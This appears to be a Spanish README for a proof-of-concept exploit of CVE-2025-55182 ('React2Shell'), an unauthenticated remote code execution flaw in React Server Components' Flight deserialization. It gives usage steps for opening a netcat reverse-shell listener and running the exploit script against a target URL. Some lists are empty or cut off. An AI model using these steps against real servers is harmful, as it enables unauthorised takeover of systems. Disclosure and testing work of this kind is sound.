Exploit de prueba de concepto para CVE-2025-55182 (React2Shell), una vulnerabilidad de ejecución remota de código no autenticada en React Server Components mediante payloads del protocolo Flight especialmente diseñados.
CVE-2025-55182, también conocida como React2Shell, es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) no autenticada que afecta a los paquetes de React Server Components (versiones 19.0, 19.1.0, 19.1.1 y 19.2.0).
Esta vulnerabilidad puede permitir a los atacantes lograr la ejecución de código arbitrario en servidores vulnerables mediante una única petición HTTP manipulada, sin requerir autenticación.
React Server Components utilizan el protocolo Flight para serializar y deserializar los datos de componentes intercambiados entre el cliente y el servidor.
Una validación inadecuada durante este proceso de deserialización puede permitir que payloads especialmente manipulados alteren estructuras internas de objetos y alcancen primitivas peligrosas de ejecución de JavaScript.
La vulnerabilidad se origina por una validación insuficiente durante la deserialización de payloads del protocolo Flight de React Server Components (RSC).
Los payloads especialmente manipulados pueden:
multipart/form-data especialmente manipuladaInicia un listener en tu máquina:
nc -lvnp 4444
Ejecuta el exploit:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Para mitigar esta vulnerabilidad:
Este proyecto se proporciona estrictamente para:
Los autores no asumen ninguna responsabilidad por el mal uso o los daños causados por este material. Los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.